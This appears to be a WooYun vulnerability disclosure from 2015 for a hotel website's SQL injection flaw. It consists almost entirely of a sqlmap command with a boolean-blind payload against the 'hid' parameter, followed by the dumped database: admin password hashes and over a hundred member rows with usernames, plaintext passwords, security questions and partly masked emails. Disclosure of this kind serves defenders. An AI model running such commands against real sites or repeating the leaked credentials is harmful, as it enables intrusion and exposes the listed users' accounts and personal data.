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漏洞作者: 路人甲

提交时间:2015-11-07 09:47

修复时间:2015-12-26 10:32

公开时间:2015-12-26 10:32





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开





python sqlmap.py -u "http://**.**.**.**/hotel.asp?hid=11&lb=kf" --random-agent -p hid --technique=B --batch --threads=10 -T member -C id,name,username,password,email --dump


Parameter: hid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: hid=11 AND 5333=5333&lb=kf
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[9 tables]
| order |
| admin |
| content |
| job |
| member |
| message |
| news |
| products |
| room |
sqlmap resumed the following injection point(s) from stored session:
Parameter: hid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: hid=11 AND 5333=5333&lb=kf
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[5 columns]
| Column | Type |
| adminpwd | non-numeric |
| adminuid | non-numeric |
| clock | numeric |
| id | numeric |
| name | non-numeric |
sqlmap resumed the following injection point(s) from stored session:
Parameter: hid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: hid=11 AND 5333=5333&lb=kf
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[5 entries]
| id | clock | adminuid | name | adminpwd |
| 19 | 0 | xiaolan | ^s??^\\?97N-\\q\\\x0fi\\?84^\\?97{\\?a1t\x06 | 49ba59abbe56e057 |
| 2 | 0 | wintx2008 | EnjoyD | 152800f9ea9313a6 |
| 20 | 0 | admin | admin | 78a9f7e994a4cdc4 |
| 21 | 0 | wintx2010 | <blank> | a0b923820dcc509a |
| 22 | 0 | admin1 | admin1 | 77804d2ba1922c33 |
sqlmap resumed the following injection point(s) from stored session:
Parameter: hid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: hid=11 AND 5333=5333&lb=kf
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: member
[8 columns]
| Column | Type |
| clock | numeric |
| email | non-numeric |
| id | numeric |
| id2 | numeric |
| name | non-numeric |
| password | numeric |
| question | non-numeric |
| username | non-numeric |
sqlmap resumed the following injection point(s) from stored session:
Parameter: hid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: hid=11 AND 5333=5333&lb=kf
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: member
[488 entries]
| id | id2 | clock | question | name | username | password | email |
| 10 | 00000001 | 0 | <blank> | gNY)OQ | leetinyau | 441622 | tin613@**.**.**.** |
| 100 | <blank> | 0 | <blank> | ?t^kf | liantuiwu | 123456 | <blank> |
| 101 | <blank> | 0 | 123321 | OUh\?93? | chz1227 | 195233 | <blank> |
| 102 | <blank> | 0 | <blank> | THACHARAKKAL | THACHARAKKAL | 123456 | <blank> |
| 103 | <blank> | 0 | <blank> | ?~\?cd? | S:Y | hitomi23 | 185502089@**.**.**.** |
| 104 | <blank> | 0 | <blank> | OUh\?93? | hezicong | 123456 | <blank> |
| 105 | <blank> | 0 | <blank> | h\?81_\?d7WZ | liangzhijian | 123456 | <blank> |
| 106 | <blank> | 0 | <blank> | ?h\?eel\?c9 | caisenquan | 123456 | <blank> |
| 107 | <blank> | 0 | <blank> | s\?8b~\?f4O\?ca | djing21 | dingjing | <blank> |
| 108 | <blank> | 0 | <blank> | ?e\?87 | xiewen | 123456 | <blank> |
| 109 | <blank> | 0 | <blank> | ?{qQu | dengxiaobing | 123456 | <blank> |
| 11 | <blank> | 0 | b?]\?f1Y\?d3N\?c0NH | ?[\?ccp\?8e | joe0307 | abc666990 | joe_che@**.**.**.** |
| 110 | <blank> | 0 | <blank> | ??Q\?9b | zhouyanjun | 123456 | <blank> |
| 111 | <blank> | 0 | <blank> | ?^? | chenguangzian | 123456 | <blank> |
| 112 | <blank> | 0 | <blank> | ?^? | chenguangxian | 123456 | <blank> |
| 113 | <blank> | 0 | <blank> | ?R | guogang | 123456 | <blank> |
| 114 | <blank> | 0 | <blank> | ?`T | xiesiji | 123456 | <blank> |
| 115 | <blank> | 0 | <blank> | Q\?af~\?cd? | fengshaohong006 | fsh13923358137 | <blank> |
| 116 | <blank> | 0 | <blank> | ??ge | chenguanlai | 123456 | <blank> |
| 117 | <blank> | 0 | <blank> | s\?8bR\?b2`z | wangjingkai | 123456 | <blank> |
| 118 | <blank> | 0 | <blank> | ABIYOU TEKETEL M | ABIYOUTEKETELM | 123456 | <blank> |
| 119 | <blank> | 0 | xiaoxue? | ?k"b | mhc | mhczy031010 | <blank> |
| 12 | <blank> | 0 | b?ZFv\?84T
[W | Wg\?cf? | robert881012 | 0101881012 | <blank> |
| 120 | <blank> | 0 | <blank> | ?u5QI | shudianguang | 123456 | <blank> |
| 121 | <blank> | 0 | <blank> | RObl | liuweiyang | 123456 | <blank> |
| 122 | <blank> | 0 | <blank> | ?f\?e6 | yuanxi | 123456 | <blank> |
| 123 | <blank> | 0 | <blank> | ?fSN | chenxiaodong | 123456 | <blank> |
| 124 | <blank> | 0 | bv\?84love | OU~\?eee\?87 | hqw00096638 | hqw13549830313 | 13450929239@**.**.**.** |
| 125 | <blank> | 0 | 1+1= | h\?81RQQ\?ac | jasonliangboy | 709394 | <blank> |
| 126 | <blank> | 0 | bY\?b9Y\?b9 | ghZ | june1234 | 19841104 | sunrise-june@**.**.**.** |
| 127 | <blank> | 0 | <blank> | ??\\?f0 | guolianfeng | 123456 | <blank> |
| 128 | <blank> | 0 | i | ?N~N\?a8 | herry11 | ikissyou | herrysoyin@**.**.**.** |
| 129 | <blank> | 0 | <blank> | Rg O& | liuyulun | 123456 | <blank> |
| 13 | <blank> | 0 | bg r1TN\?c0NH? | gN?`i | lovewjw | lovewjw123 | <blank> |
| 130 | <blank> | 0 | <blank> | GANDHI AASIT | AASIT | 123456 | <blank> |
| 131 | <blank> | 0 | <blank> | _ ? | zhangxue | 123456 | <blank> |
| 132 | <blank> | 0 | <blank> | l_?nV | jiangjinhu | 123456 | <blank> |
| 133 | <blank> | 0 | <blank> | ?n[? | chenzhanxiong | 123456 | <blank> |
| 134 | <blank> | 0 | <blank> | ?mwl\?e2 | puxuhaibo | 11251029 | puxuhaibo@**.**.**.** |
| 135 | <blank> | 0 | <blank> | NQ\?b0 | keyman | 20011118 | <blank> |
| 136 | <blank> | 0 | <blank> | _ RN0 | zhangchuangfeng | 123456 | <blank> |
| 137 | <blank> | 0 | <blank> | gNt | lichen | 123456 | <blank> |
| 138 | <blank> | 0 | <blank> | Y\?dch | jiangli | 123456 | <blank> |
| 139 | <blank> | 0 | <blank> | ?^\?fa[\?89 | taojianan | 123456 | <blank> |
| 14 | <blank> | 0 | I LOVE U | ?Qtl\?fd | cityekin | 111111 | is_victor@**.**.**.** |
| 140 | <blank> | 0 | <blank> | ldTQ\?9b | tangjunjun | 123456 | <blank> |
| 141 | <blank> | 0 | <blank> | RfhR) | liuchenli | 123456 | <blank> |
| 142 | <blank> | 0 | <blank> | ?k"b | mhczy | mlb031010 | <blank> |
| 143 | <blank> | 0 | 1+1= | LF | liquid | 123456 | <blank> |
| 144 | <blank> | 0 | <blank> | T3tKP+ | iswlw586 | iswlw586 | <blank> |
| 145 | <blank> | 0 | br1Tv\?84l4g\?9c? | ?uYO/ | sqhulin | 201314 | sqhulin@**.**.**.** |
| 146 | <blank> | 0 | ?^\?97T
| g\?97ag? | YAMAHA | 730385 | <blank> |
| 147 | <blank> | 0 | 1 | ?_\?b7fo | ludejing | 253628 | <blank> |
| 148 | <blank> | 0 | bv\?84PvP\?cf | g\?97SSeO | ivenlam | 13149394 | <blank> |
| 149 | <blank> | 0 | bY\?88Y\?88v\?84T
[Wf/? | gNyV`\?e0 | jovelzh | 198522 | jovelzh@**.**.**.** |
| 15 | <blank> | 0 | <blank> | \9QHu | yinzhiwu | 13650305837 | <blank> |
| 150 | <blank> | 0 | 1 | ?^\?fa | jerryjian | 245718 | <blank> |
| 151 | <blank> | 0 | MY TEACHER | h\?81q\?d5k# | FURNILIFE | maxis012 | <blank> |
| 152 | <blank> | 0 | <blank> | [Yf-? | sunzm1977 | 770321 | <blank> |
| 153 | <blank> | 0 | what is your pet | raymond | wardanray | methuselah | wardanray@**.**.**.** |
| 154 | <blank> | 0 | Y)e\?f6W0R)N\?baT\?8cQ\?fa????Nf | ?U\?9c^s | ?U\?9c^s | 818160 | 1350036006@**.**.**.** |
| 155 | <blank> | 0 | bv\?84T
[W | _\?90^\?9a | frankhsu0119 | 19900119 | frankhsu0119@**.**.**.** |
| 156 | <blank> | 0 | mail | g1W? | 01519713 | 2702alon | eks@**.**.**.** |
| 157 | <blank> | 0 | ?ZF | O
V\?fd? | gdzqfkwgf | 432101234 | 233856@**.**.**.** |
| 158 | <blank> | 0 | 521 | _m[\?8f | _m[\?8f | 521zhuzhu | <blank> |
| 159 | <blank> | 0 | k\?cd?Y\?d3 | h\?81m\?d1? | sohomandy | aa34251700 | 1346057646.qzone.**.**.**.** |
| 16 | <blank> | 0 | <blank> | DAVID WANG | A13823538269 | 111111 | <blank> |
| 160 | <blank> | 0 | <blank> | ?? | feigao | feigao | <blank> |
| 161 | <blank> | 0 | w | gN?SN | seaman408 | 821115 | taufiq.mme@**.**.**.** |
| 162 | <blank> | 0 | <blank> | O
m\?d1gp | steven | wsjjsw | wsj25788@**.**.**.** |
| 163 | <blank> | 0 | <blank> | R? | abcly888 | 584131420 | <blank> |
| 164 | <blank> | 0 | g U\?9ck"v\?84??? | gNf%h\?85 | aoxue23 | 820204 | snow251@**.**.**.** |
| 165 | <blank> | 0 | Andrey | Andrey Kosinov | Kasandra2009 | andreykosinov | [email protected] |
| 166 | <blank> | 0 | <blank> | N%_\?b7f | tcdirect | tmmonitor | sales@**.**.**.**.au |
| 167 | <blank> | 0 | ue\?e5e\?f6? | S\?f6m* | yh977263 | 977263 | <blank> |
| 168 | <blank> | 0 | <blank> | O
m\?d1gp | wsj25788 | wsjjsw123 | <blank> |
| 169 | <blank> | 0 | <blank> | <blank> | hjh | rtm6172001 | <blank> |
| 17 | <blank> | 0 | <blank> | [YfSfT | sliun | sun123 | 9042@vip.**.**.**.** |
| 170 | <blank> | 0 | bv\?84?n/?N\?fd | h\?81f%Zw | wing852019101 | wing157958 | <blank> |
| 171 | <blank> | 0 | <blank> | FABBRI | FABBRI | ganay1 | thibautfabbri@**.**.**.** |
| 172 | <blank> | 0 | <blank> | _ k\?c5 | _ k\?c5 | 101215 | <blank> |
| 173 | <blank> | 0 | <blank> | gN_\?d7SN | zsxlai | ai670714670607 | zsxlai@**.**.**.** |
| 174 | <blank> | 0 | Feline | William Kennerley | bkennerley | DaphnE1 | [email protected] |
| 175 | <blank> | 0 | ~\?d3ZZ~\?aa_\?f5e\?e5 | _ ~\?a2 | tony | 957221 | <blank> |
| 176 | <blank> | 0 | wode | KO MIN SUNG | brokerkms | 01031740731 | brokerkms@**.**.**.** |
| 177 | <blank> | 0 | <blank> | h\?81?q\?99 | camby_lsh | abcdefh | camby_lsh@**.**.**.** |
| 178 | <blank> | 0 | 123 | _ YTt\ | tobyzb | 157313 | <blank> |
| 179 | <blank> | 0 | GF | ?fz`R | kchken | 64898603 | <blank> |
| 18 | <blank> | 0 | ^8u( | \Hj9_7 | watsk | 168168 | watshukeung@**.**.**.** |
| 180 | <blank> | 0 | hello | h\?81Pe`! | starfishgu | winson | starfishgu@**.**.**.** |
| 181 | <blank> | 0 | ZZ[\?b6Na | ^\?84? | zzzwck | 970504 | zzzwck@**.**.**.** |
| 182 | <blank> | 0 | O`Q\?fauv\?84W0e\?b9f/? | g1N\?91N | dongdong060 | 13923113309 | <blank> |
| 183 | <blank> | 0 | 201314 | ^\?d6SNh | liaohs | Gd781021 | liaohsh@**.**.**.** |
| 184 | <blank> | 0 | <blank> | ?f | ellalee21cn | lm6371 | <blank> |
| 185 | <blank> | 0 | 42913818 | Fiona Chiu | csf8109 | 42913818 | csf8109@**.**.**.** |
| 186 | <blank> | 0 | bv\?84 | R\\?f0 | R\\?f0 | leo123123 | leoliufeng@**.**.**.** |
| 187 | <blank> | 0 | China mobile | ??? | tflung | 13600269844 | tflung@**.**.**.** |
| 188 | <blank> | 0 | bv\?84?rLS\?f7? | Q\?bc^\?fa\O | kongque | xjpzjq971217 | <blank> |
| 189 | <blank> | 0 | Where did you spend your honeymoon | allegarielwo | allegarielwo | super123 | salt621217@**.**.**.** |
| 19 | <blank> | 0 | <blank> | Wanchai T. | Wanchaitaw | 3209pele | wanchaitaw@**.**.**.** |
| 190 | <blank> | 0 | Where did you spend your honeymoon | mondtori | mondtori | super123 | gaudinpreis@**.**.**.** |
| 191 | <blank> | 0 | daughter's B day | Yoong Boon Hong | bhyoong | 23041998 | bhyoong@**.**.**.** |
| 192 | <blank> | 0 | What is your youngest child's nickname | arynita | arynita | super123 | a728ff7c8@**.**.**.** |
| 193 | <blank> | 0 | What is your youngest child's nickname | dbeedtrin | dbeedtrin | super123 | tour789823@**.**.**.** |
| 194 | <blank> | 0 | Where did you spend your honeymoon | rathjeterr | rathjeterr | super123 | coat724875@**.**.**.** |
| 195 | <blank> | 0 | What is your youngest child's nickname | erbergsons | erbergsons | super123 | qianrouzhong@**.**.**.** |
| 196 | <blank> | 0 | What is your youngest child's nickname | inweinburgquent | inweinburgquent | super123 | klechaxnr@**.**.**.** |
| 197 | <blank> | 0 | Where did you spend your honeymoon | dorohlfsoswal | dorohlfsoswal | super123 | bb6a62636@**.**.**.** |
| 198 | <blank> | 0 | Where did you spend your honeymoon | carlettkurt | carlettkurt | super123 | yaochuaifctumx@**.**.**.** |
| 199 | <blank> | 0 | <blank> | ?e\?edQI | zhaoxg | 82328134 | 13924303086@**.**.**.** |
| 20 | <blank> | 0 | <blank> | gNPe\\?f0 | kg21lifeng | 2269838 | <blank> |
| 200 | <blank> | 0 | Where did you spend your honeymoon | willigpaul | willigpaul | super123 | pettryzfs@**.**.**.** |
| 201 | <blank> | 0 | Where did you spend your honeymoon | steanstegan | steanstegan | super123 | lushengasuxbz@**.**.**.** |
| 202 | <blank> | 0 | Where did you spend your honeymoon | otrembamerle | otrembamerle | super123 | reidertjl@**.**.**.** |
| 203 | <blank> | 0 | Where did you spend your honeymoon | nskieral | nskieral | super123 | slip23572@**.**.**.** |
| 204 | <blank> | 0 | What is your youngest child's nickname | hricohugh | hricohugh | super123 | cfd6e0c9@**.**.**.** |
| 205 | <blank> | 0 | What is your youngest child's nickname | reckiabdu | reckiabdu | super123 | pandaijusmat@**.**.**.** |
| 206 | <blank> | 0 | Where did you spend your honeymoon | ponticlar | ponticlar | super123 | pick223721@**.**.**.** |
| 207 | <blank> | 0 | What is your youngest child's nickname | ogainsottoh | ogainsottoh | super123 | mud47876@**.**.**.** |
| 208 | <blank> | 0 | What is your youngest child's nickname | rrierdoug | rrierdoug | super123 | blehmfal@**.**.**.** |
| 209 | <blank> | 0 | Where did you spend your honeymoon | terburyjorg | terburyjorg | super123 | dalton16288@**.**.**.** |
| 21 | <blank> | 0 | 123123 | ?? | happpysos | 851139 | <blank> |
| 210 | <blank> | 0 | What is your youngest child's nickname | astrowbridmaxim | astrowbridmaxim | super123 | manaskaneho@**.**.**.** |
| 211 | <blank> | 0 | What is your youngest child's nickname | wertnereric | wertnereric | super123 | fzi31351638824@**.**.**.** |
| 212 | <blank> | 0 | What is your youngest child's nickname | hain | hain | super123 | barthegvv@**.**.**.** |
| 213 | <blank> | 0 | Where did you spend your honeymoon | rourbill | rourbill | super123 | zhuzhoukkvrja@**.**.**.** |
| 214 | <blank> | 0 | What is your youngest child's nickname | proppelen | proppelen | super123 | mark259514@**.**.**.** |
| 215 | <blank> | 0 | Where did you spend your honeymoon | revomais | revomais | super123 | shappyfqd@**.**.**.** |
| 216 | <blank> | 0 | What is your youngest child's nickname | kowronskishads | kowronskishads | super123 | xiongdiaoyu@**.**.**.** |
| 217 | <blank> | 0 | bk\?cdN\?b2T
[W | _ gp? | zjneng | 43420024 | zjnvip@**.**.**.** |
| 218 | <blank> | 0 | Where did you spend your honeymoon | ilmettechlo | ilmettechlo | super123 | moehnarlotta@**.**.**.** |
| 219 | <blank> | 0 | Where did you spend your honeymoon | todunnelmarg | todunnelmarg | super123 | widellurh@**.**.**.** |
| 22 | <blank> | 0 | <blank> | v}?f | pai00066188 | pai00066188 | pai0938011533@**.**.**.** |
| 220 | <blank> | 0 | TEL | Tommy Cheung | engco | 27508930 | 118@**.**.**.** |
| 221 | <blank> | 0 | What is your youngest child's nickname | ipsonguss | ipsonguss | super123 | jingminla@**.**.**.** |
| 222 | <blank> | 0 | What is your youngest child's nickname | raevicki | raevicki | super123 | speieroce@**.**.**.** |
| 223 | <blank> | 0 | What is your youngest child's nickname | monigoldkris | monigoldkris | super123 | ec36bd97b@**.**.**.** |
| 224 | <blank> | 0 | Where did you spend your honeymoon | hecksolv | hecksolv | super123 | mccaguetjy@**.**.**.** |
| 225 | <blank> | 0 | What is your youngest child's nickname | efirtomm | efirtomm | super123 | bokosun881@**.**.**.** |
| 226 | <blank> | 0 | Where did you spend your honeymoon | dechanteuge | dechanteuge | super123 | come844275@**.**.**.** |
| 227 | <blank> | 0 | What is your youngest child's nickname | iakoczelclem | iakoczelclem | super123 | wangqiangxyq871@**.**.**.** |
| 228 | <blank> | 0 | What is your youngest child's nickname | anderlindemetav | anderlindemetav | super123 | efdcb31c0@**.**.**.** |
| 229 | <blank> | 0 | What is your youngest child's nickname | yeshibastar | yeshibastar | super123 | sorokataktl@**.**.**.** |
| 23 | <blank> | 0 | <blank> | CHAN YIU KWONG | jacky | 66882229 | jacky-3311@**.**.**.** |
| 230 | <blank> | 0 | What is your youngest child's nickname | amcmurdilash | amcmurdilash | super123 | dc5429bc@**.**.**.** |
| 231 | <blank> | 0 | Where did you spend your honeymoon | indrickdann | indrickdann | super123 | bange__5204637671@**.**.**.** |
| 232 | <blank> | 0 | Where did you spend your honeymoon | tchottelloy | tchottelloy | super123 | santoyauyr@**.**.**.** |
| 233 | <blank> | 0 | Where did you spend your honeymoon | ahenneyalbe | ahenneyalbe | super123 | severysao@**.**.**.** |
| 234 | <blank> | 0 | Where did you spend your honeymoon | tewoldemarl | tewoldemarl | super123 | hill31313@**.**.**.** |
| 235 | <blank> | 0 | What is your youngest child's nickname | wndmend | wndmend | super123 | idle34714@**.**.**.** |
| 236 | <blank> | 0 | Where did you spend your honeymoon | aurichlora | aurichlora | super123 | tie12156@**.**.**.** |
| 237 | <blank> | 0 | Where did you spend your honeymoon | carrantyson | carrantyson | super123 | barthegvv@**.**.**.** |
| 238 | <blank> | 0 | What is your youngest child's nickname | etiptonpierr | etiptonpierr | super123 | zybiahazelb@**.**.**.** |
| 239 | <blank> | 0 | What is your youngest child's nickname | eonsharrarnapol | eonsharrarnapol | super123 | pick223721@**.**.**.** |
| 24 | <blank> | 0 | bg r1v\?84N\?ba | R\?b3l8? | O[\q[\?89S\?cb | 000001 | 5644629@**.**.**.** |
| 240 | <blank> | 0 | Where did you spend your honeymoon | onstaglesshelt | onstaglesshelt | super123 | hanqiuvjhevq@**.**.**.** |
| 241 | <blank> | 0 | Where did you spend your honeymoon | illopswend | illopswend | super123 | zenniuvuewjn@**.**.**.** |
| 242 | <blank> | 0 | Where did you spend your honeymoon | hurstonisau | hurstonisau | super123 | ruanliantou@**.**.**.** |
| 243 | <blank> | 0 | What is your youngest child's nickname | emeterdene | emeterdene | super123 | yangilan66889941@**.**.**.** |
| 244 | <blank> | 0 | What is your youngest child's nickname | singerivan | singerivan | super123 | duignanpit@**.**.**.** |
| 245 | <blank> | 0 | Where did you spend your honeymoon | aiamerl | aiamerl | super123 | huangdaichou@**.**.**.** |
| 246 | <blank> | 0 | What is your youngest child's nickname | potiesriley | potiesriley | super123 | cenqiauehzrn@**.**.**.** |
| 247 | <blank> | 0 | N N\?8cN | N N\?8cN | admin | admin | <blank> |
| 248 | <blank> | 0 | What is your youngest child's nickname | einererne | einererne | super123 | barker26179@**.**.**.** |
| 249 | <blank> | 0 | Where did you spend your honeymoon | nderschozulm | nderschozulm | super123 | star89863@**.**.**.** |
| 250 | <blank> | 0 | What is your youngest child's nickname | aldojoel | aldojoel | super123 | rub53372@**.**.**.** |
| 251 | <blank> | 0 | What is your youngest child's nickname | glelane | glelane | super123 | samperecao@**.**.**.** |
| 252 | <blank> | 0 | Where did you spend your honeymoon | chunemanshav | chunemanshav | super123 | escarsegaopn@**.**.**.** |
| 253 | <blank> | 0 | Where did you spend your honeymoon | hinsleyraym | hinsleyraym | super123 | jingdingmiao@**.**.**.** |
| 254 | <blank> | 0 | What is your youngest child's nickname | rsaul | rsaul | super123 | lorimortbs@**.**.**.** |
| 255 | <blank> | 0 | What is your youngest child's nickname | rvanther | rvanther | super123 | bretlgqi@**.**.**.** |
| 256 | <blank> | 0 | What is your youngest child's nickname | nbiedermanweldo | nbiedermanweldo | super123 | ecd4b70df@**.**.**.** |
| 257 | <blank> | 0 | What is your youngest child's nickname | verhagennane | verhagennane | super123 | b63b4a91@**.**.**.** |
| 258 | <blank> | 0 | What is your youngest child's nickname | argottavinam | argottavinam | super123 | zhuzhoukkvrja@**.**.**.** |
| 259 | <blank> | 0 | What is your youngest child's nickname | zollingegabr | zollingegabr | super123 | krianjay8035@**.**.**.** |
| 260 | <blank> | 0 | What is your youngest child's nickname | vetonisob | vetonisob | super123 | fork228221@**.**.**.** |
| 261 | <blank> | 0 | Where did you spend your honeymoon | ndiaronca | ndiaronca | super123 | dannemanvtj@**.**.**.** |
| 262 | <blank> | 0 | What is your youngest child's nickname | erralaza | erralaza | super123 | wittenmyerlij@**.**.**.** |
| 263 | <blank> | 0 | What is your youngest child's nickname | melonejaci | melonejaci | super123 | yanhelai@**.**.**.** |
| 264 | <blank> | 0 | What is your youngest child's nickname | pseymyro | pseymyro | super123 | fb5748475@**.**.**.** |
| 265 | <blank> | 0 | Where did you spend your honeymoon | nicknita | nicknita | super123 | rynkowskixxc@**.**.**.** |
| 266 | <blank> | 0 | Where did you spend your honeymoon | koteydesp | koteydesp | super123 | yangzanevtrmw@**.**.**.** |
| 267 | <blank> | 0 | What is your youngest child's nickname | channgans | channgans | super123 | trevinodud@**.**.**.** |
| 268 | <blank> | 0 | <blank> | Ne\?87QC | ants | adomas | <blank> |
| 269 | <blank> | 0 | sureyash2 | arun nandlal sureka | arun | sureyash2 | tileimport2012@**.**.**.** |
| 270 | <blank> | 0 | <blank> | S\YN\?d9[P | starrywaltz | rhea1101 | <blank> |
| 271 | <blank> | 0 | Mother's name | ?WZf | vkmcheng | 2kenneth | vkmcheng@**.**.**.** |
| 272 | <blank> | 0 | call | gNe\?edg\?97 | llluke | hanlin27 | li10327@**.**.**.** |
| 273 | <blank> | 0 | Where did you spend your honeymoon | choosebluetooth | choosebluetooth | super123 | host64291@**.**.**.** |
| 274 | <blank> | 0 | <blank> | ?e\?edQI | zhaoxuguang | 82328134 | [email protected] |
| 275 | <blank> | 0 | bY\?88Y\?88v\?84T
[W | _ n\?90? | source43 | 2281933 | tr@**.**.**.** |
| 276 | <blank> | 0 | wwwwwww | ?? | chengeng | 830209 | 87532295@**.**.**.** |
| 277 | <blank> | 0 | <blank> | Chu pan | Macauben | 28438864 | Macauben@**.**.**.** |
| 278 | <blank> | 0 | <blank> | netchanock uthairat | lekkiosk | lek1971 | lek@**.**.**.** |
| 279 | <blank> | 0 | bv\?84Y\?d3T
| Y\?dag~i\?95 | yaosongrong | yaoyang | 21231299@**.**.**.** |
| 280 | <blank> | 0 | <blank> | gNQIu0 | qw881012 | 881012 | <blank> |
| 281 | <blank> | 0 | <blank> | POON WAI TONG | charlespoon | 91889057 | gracelam220@**.**.**.** |
| 282 | <blank> | 0 | What is your youngest child's nickname | jacketjacket | jacketjacket | super123 | aoqinga68537@**.**.**.** |
| 283 | <blank> | 0 | <blank> | R~\?f4\\?b3 | samu31 | 131616 | <blank> |
| 284 | <blank> | 0 | What is your youngest child's nickname | northnorth | northnorth | super123 | wuliankeauab@**.**.**.** |
| 285 | <blank> | 0 | Where did you spend your honeymoon | replicajewellry | replicajewellry | super123 | barbierithe@**.**.**.** |
| 286 | <blank> | 0 | What is your youngest child's nickname | thenuptse | thenuptse | super123 | zhaoyeyzqrpt@**.**.**.** |
| 287 | <blank> | 0 | Where did you spend your honeymoon | eveninggowns | eveninggowns | super123 | yiyam70680@**.**.**.** |
| 288 | <blank> | 0 | maxua | ?QHu | maxua | 13760989912 | maxua@**.**.**.** |
| 289 | <blank> | 0 | gf | Q\?afmin\?90 | ivanfeng | fujikon | <blank> |
| 290 | <blank> | 0 | Fan | NACHAPHON THANAPHOLD | nachaphon.t | 6785674-5 | <blank> |
| 291 | <blank> | 0 | 13726002597 | ^\?d6?f | 13726002597 | 13726002597 | <blank> |
| 292 | <blank> | 0 | bg r1v\?84N\?ba | R\?b3l8? | OO16i|v\?84r[r[ | 8617785yingying | <blank> |
| 293 | <blank> | 0 | dad middle name | Tee Wee Lin | tee_keith | 19021996 | tee_keith@**.**.**.**.sg |
| 294 | <blank> | 0 | bb@W(v\?84QlS\?f8T
y\?f0 | gh` N\?ae | babbittlight | yhl19890323 | chinayangmr@**.**.**.** |
| 295 | <blank> | 0 | NAME | DAVID | WANG | 123456 | 123456 |
| 296 | <blank> | 0 | date of birth | Mohammed Alhamid | malhamid | 13750000 | malhamid@**.**.**.** |
| 297 | <blank> | 0 | 123456 | ?[\?97? | jonas | `1234567 | <blank> |
| 298 | <blank> | 0 | <blank> | ?g^s | bedofnail | 12345678 | <blank> |
| 299 | <blank> | 0 | First Pet? | LIM KEE HAU | limkeehau | 82052288 | lim0306@**.**.**.** |
| 30 | <blank> | 0 | bbbbb | feerpp | bbbbb | bbbbb | <blank> |
| 300 | <blank> | 0 | <blank> | ??gC | ryanfs | 840229 | <blank> |
| 301 | <blank> | 0 | ?k#Q?v\?84ue\?e5 | ?t3t3 | linlin-588 | 20070908 | <blank> |
| 302 | <blank> | 0 | Q\?fauW0 | N\?fb\Y\?d0 | cakescakes | cakes2251610520 | <blank> |
| 303 | <blank> | 0 | 123456 | Wbq\?99 | type008 | betty888138 | <blank> |
| 304 | <blank> | 0 | mother's name | Vanessa Lim | Vanessa | 152128khc | nikchen.chen@**.**.**.** |
| 305 | <blank> | 0 | b?Qlv\?84T
[W | ghV k# | mercury | xiao3368558xin | mercury_yeung1989@**.**.**.** |
| 306 | <blank> | 0 | Name of my son | Wong Ho | bendon | 252700 | ph_wong25@**.**.**.** |
| 307 | <blank> | 0 | br1v\?84N\?ba | R[\?8fm\?9b | o0taoo0 | liu@4156 | [email protected] |
| 308 | <blank> | 0 | br1N\?c0NH?NP | R? | Ly929 | 20120725 | <blank> |
| 309 | <blank> | 0 | <blank> | OYs\?ae | yw1209 | 110110 | <blank> |
| 31 | <blank> | 0 | 123456 | h\?81q\?d5~\?a2 | h\?81q\?d5~\?a2 | 123456 | <blank> |
| 310 | <blank> | 0 | Home phone | [Y[\?b6l\?bb | sunchia | 7062425 | <blank> |
| 311 | <blank> | 0 | <blank> | bt^? | qitee1986 | 13420212164 | <blank> |
| 312 | <blank> | 0 | wife | T3^\?fa_\?e0 | cedriccelia | celia | cedricwu@**.**.**.** |
| 313 | <blank> | 0 | chirag | CHIRAG LALWANI | chirag | chirag | chirag.lalwani@**.**.**.** |
| 314 | <blank> | 0 | bf/? | ?v\?dbe\?af | \Y'e\?af850824 | 867276 | <blank> |
| 315 | <blank> | 0 | 1+1 | Q\?afs\?cdY\?ae | jennyjenny85 | hydehyde | jennyjenny85@**.**.**.** |
| 316 | <blank> | 0 | ?e\?87T
| _\?90?Zw | linushsu | linushus | <blank> |
| 317 | <blank> | 0 | who is ur wife? | CHO HIU LEONG | hiulcho2 | 20070124 | hiuleongcho@**.**.**.** |
| 318 | <blank> | 0 | 20century teen | balasubramanian | balas | 2019bala | bala2005@**.**.**.** |
| 319 | <blank> | 0 | Favorite City | ?_\?d7? | vincent1020 | knlgcg748 | vincent1020@**.**.**.** |
| 32 | <blank> | 0 | <blank> | ?? | HAPPYSOS | 851139 | <blank> |
| 320 | <blank> | 0 | bv\?84[\?b6W(T\?ea?? | ?V\?fd_: | billykant | Kant3513596 | billykant@**.**.**.** |
| 321 | <blank> | 0 | ?rL | ?\s\?b2 | littlecsl | little160882 | <blank> |
| 322 | <blank> | 0 | b[\?b6?v\?84u5?f/? | ?^\?86? | qfqin | qinqf820208 | <blank> |
| 323 | <blank> | 0 | Where did you sp | icefogliawalla | icefogliawalla | F2c942b! | eoncesex@**.**.**.** |
| 324 | <blank> | 0 | Where did you sp | hmmiholl | hmmiholl | 151D037! | aosomeadulttoys@**.**.**.** |
| 325 | <blank> | 0 | Where did you sp | aablemanocta | aablemanocta | B0f829e! | cplinkadulttoys@**.**.**.** |
| 326 | <blank> | 0 | b_\?97N-[f | ?Oit* | suandkaykay | 0103130389 | 403388265@**.**.**.** |
